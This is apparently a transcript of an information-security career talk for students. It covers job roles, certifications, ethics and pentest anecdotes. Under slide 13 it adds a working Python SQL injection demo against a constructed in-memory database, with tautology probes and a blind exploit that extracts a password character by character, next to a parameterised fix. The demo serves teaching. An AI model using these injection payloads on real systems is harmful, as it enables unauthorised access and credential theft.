A Career in Information Security as Described by Animated GIFs


This presentation will provide some insights (and funny images) to help explain what life is like in information security and some tips to make you a better candidate for roles. If you're in college and looking to get a few pointers, this may be worth a few minutes of your time to review.

Published in: Technology

1. A Career In Information Security As Described By Animated GIFs
   Mark Stanislav <>

2. Your Presenter, In A Few Bullet Points
   ‣ 12 years of experience with roles in UNIX systems administration, PHP/Ruby development, and many areas of information security
   ‣ B.S. in Networking & IT Administration (EMU)
   ‣ M.S. in Technology Studies, Information Assurance (EMU)
   ‣ CISSP, Security+, Linux+, CCSK certifications
   ‣ Presented for around 50 conferences/groups in the past three years
   ‣ Currently the Security Evangelist at Duo Security in Ann Arbor

3. What Are We Doing?
   ‣ I’m going to talk about having a career within information security!
   ‣ This will be done with GIFs from an awesome site found at
   ‣ Questions are encouraged as time permits. You can always reach out to me afterwards as well via e-mail, Twitter, etc.
   ‣ Let’s warm up...

4. Many Roads To Go Down And They Always Converge
   ‣ Even if you start your career as a network engineer, system administrator, or web developer, you can still be “in infosec”
   ‣ Don’t think you have to be an “ethical hacker” to participate or be well regarded in the industry
   ‣ The experience you can gain in one or more of these roles can be a huge advantage over your security-centric peers

5. Don’t Believe Me?
   ‣ Understanding how a technology works, by either developing for it or having to defend it, puts you way ahead of other attackers
   ‣ There is entirely too much emphasis on how to use tools in modern information security curricula -- build stuff/break stuff!
   ‣ Tools are always getting better, so you need to continually bring more to the table to be an in-demand hire

6. Not All Of Information Security Is Hacking
   ‣ There are plenty of high-paying, somewhat technical jobs in security, like being an auditor or on a digital forensics team
   ‣ The mindset of a hacker can easily be applied within different roles, not just writing exploits or cracking passwords
   ‣ Information security professionals have many ways they can pivot in a career; don’t get frustrated, be creative with your skills

7. Roles In Information Security... A Short List
   ‣ Penetration Testing
   ‣ Standard/Regulation Auditing
   ‣ Web Application Security Review
   ‣ Vulnerability Assessment
   ‣ Cryptography
   ‣ Digital Forensics
   ‣ Security Analyst
   ‣ Policy Development
   ‣ Security Architecture
   ‣ Network Security Engineer
   ‣ Vulnerability Management
   ‣ System Security Engineer

8. Don’t Plan Your Career For One Niche
   ‣ If you plan your entire information security career around one singular aspect you think you’ll always enjoy, you’re cheating yourself out of a lot of great career paths
   ‣ Being a “jack of all trades” isn’t a bad thing; it makes you valuable
   ‣ I call a fixation with one sexy job role “Social Engineer Syndrome”
   ‣ Social engineering is almost always a part of a job in information security and not a job itself

9. Information Security Can Be Stressful
   ‣ When you’re working on a client’s network, accidentally knocking over their production server, deleting critical data, or locking their team out can happen if you’re not careful
   ‣ Any idea how long you’re going to stay employed carelessly running automated tools? =)

10. The Reality Of Being An Ethical Hacker
   (Two GIFs: “What many people think it’s like” vs. “What you usually feel like”)

11. Spending Your Day As An Ethical Hacker
   A Typical Security Engagement (pie chart):
   ‣ Hacking 45%
   ‣ Recon 25%
   ‣ Reports 20%
   ‣ Calls 5%
   ‣ Emails 5%
   ...but what it feels like when you own a client’s network and/or data (GIF)

12. Certifications
   ‣ If you’re looking to get your first job in information security, certifications are a great way to set yourself apart from peers
   ‣ After you have a career, however, most people only get certifications if they have to, per their employer’s request/need
   ‣ Having a certification does not make a person an expert
   ‣ While we’re on the subject, PLEASE do not put “expert” anywhere on your resume. Seriously.
13. Learn To Hack And Then Learn To Automate
   ‣ Try to attack an application before scanning it for known issues
   ‣ Being able to find an issue, rather than being told there is an issue, makes a better attacker
   ‣ Once you find a vulnerability, try to write a custom exploit
   ‣ Knowing how to exploit a SQL injection issue means way more than knowing ./sqlmap -u
   ‣ Make a “lab” with penetration testing virtual machines to learn!
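The “find it by hand, then write the exploit” loop on this slide, as an added example that is not part of the talk: a constructed in-memory SQLite login (the `users` table, its two accounts and the `login_vulnerable`/`login_fixed`/`probe`/`extract_password` names are all assumptions made for the demo). `probe` is the two manual requests you would send before reaching for sqlmap (a lone quote to see whether the syntax breaks, a tautology plus comment to see whether it logs you in), and `extract_password` is the custom exploit that follows: the login result is a one-bit oracle, and each injected subquery asks whether character N of the target’s password equals a given character.

```python
"""Manual SQL injection discovery, then a hand-written boolean-based blind
exploit, against a constructed in-memory SQLite login.
Added example; the app, table and data are made up for illustration."""
import sqlite3
import string


def build_app() -> sqlite3.Connection:
    """Constructed sample application state (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret!"), ("alice", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username: str, password: str) -> bool:
    """String-concatenated query: user input becomes SQL syntax (the bug)."""
    sql = (f"SELECT id FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, username: str, password: str) -> bool:
    """Parameterised query: the same logic with input bound as data, not syntax."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def probe(conn, login) -> dict:
    """Step 1, find it by hand. Two requests, no scanner:
    a lone quote (does broken syntax reach the database?) and a tautology
    followed by a comment that swallows the password check (does it log in?)."""
    findings = {}
    try:
        login(conn, "'", "x")
        findings["quote_breaks_query"] = False
    except sqlite3.OperationalError:          # SQLite syntax error surfaced to us
        findings["quote_breaks_query"] = True
    findings["tautology_logs_in"] = login(conn, "' OR 1=1 -- ", "x")
    return findings


def extract_password(conn, login, target: str, max_len: int = 64) -> str:
    """Step 2, write the custom exploit. Boolean-based blind extraction:
    login() is a one-bit oracle, so we ask yes/no questions about the target
    row one character at a time. No error text or data is ever echoed back."""
    def oracle(condition: str) -> bool:
        # Injected into the username; '-- ' comments out the password clause.
        return login(conn, f"' OR ({condition}) -- ", "x")

    t = target.replace("'", "''")             # keep our own payload well-formed
    length = next((n for n in range(1, max_len + 1)
                   if oracle(f"(SELECT length(password) FROM users WHERE username='{t}')={n}")),
                  None)
    if length is None:
        raise ValueError("target not found or password longer than max_len")

    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, length + 1):
        for c in alphabet:
            cc = c.replace("'", "''")
            if oracle(f"(SELECT substr(password,{pos},1) FROM users "
                      f"WHERE username='{t}')='{cc}'"):
                recovered += c
                break
        else:
            raise ValueError(f"character {pos} not in alphabet")
    return recovered


if __name__ == "__main__":
    conn = build_app()
    print("vulnerable:", probe(conn, login_vulnerable))
    print("fixed:     ", probe(conn, login_fixed))
    print("admin password via blind SQLi:", extract_password(conn, login_vulnerable, "admin"))
```

Run it and the vulnerable login reports both manual probes positive and gives up the admin password one character at a time; the parameterised version answers both probes negatively and the same exploit cannot get past the length check. The point the slide makes is the part between those two runs: you only know what to automate because you first understood, by hand, why the tautology logged you in.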
14. Try Your Hand At Security Research
   ‣ Scour GitHub, SourceForge, and Google Code for applications that contain vulnerabilities... then responsibly report them!
   ‣ Have an IP camera on your network? How about a “Smart” TV?
   ‣ Does your company have a security team? Volunteer to test code.
   ‣ Have friends/family with a business? Ask to evaluate security.

15. Participate In Team Activities Like Capture The Flag
   ‣ Information Security Talent Search (ISTS)
   ‣ DC3 Digital Forensics Challenge
   ‣ Cyber Security Awareness Week CTF

16. Tips To Maximize Your Career Potential
   ‣ There are lines not to cross. Don’t break into anything without permission, even if you have the best of intentions in doing so.
   ‣ Be humble. There are plenty of people who know everything you know and about 100x more. Humility is a lost art in the industry.
   ‣ Learn how to explain yourself to non-technical people. It’s not their fault if they don’t understand you, it’s yours.
   ‣ Don’t say you know “how to hack”... it doesn’t mean anything.

17. How To Keep Informed, Part 1/2
   Pay attention to information security news web sites:
   ‣ Forbes Security:
   ‣ Threatpost:
   ‣ SC Magazine:
   Read mailing list postings about vulnerabilities:
   ‣ Full Disclosure:
   Follow security professionals on Twitter

18. How To Keep Informed, Part 2/2
   Attend conferences around the area:
   ‣ B-Sides Detroit:
   ‣ Secureworld Detroit:
   ‣ GrrCon:
   Attend security meet-up groups:
   ‣ #misec:
   ‣ ARBSEC:
   ‣ MotorCity ISSA:

19. Funny Attacker Stories...
   Story #1: Medical Insurance Company - Penetration Test
   ‣ Very well coded web application was the primary point of attack... not much else to go after
   ‣ Almost gave up when I tried and “became” an administrator
   ‣ Gave the web developer his own password during the close-out call :)
   Story #2: Property Insurance Company - Penetration Test
   ‣ During Open-Source Intelligence (OSINT) gathering via Google, found a development web site
   ‣ The developer building their new web site had installed a plugin that had a vulnerability
   ‣ I compromised multiple user accounts and logged into their Intranet and e-mail systems

20. Thanks! Questions? @markstanislav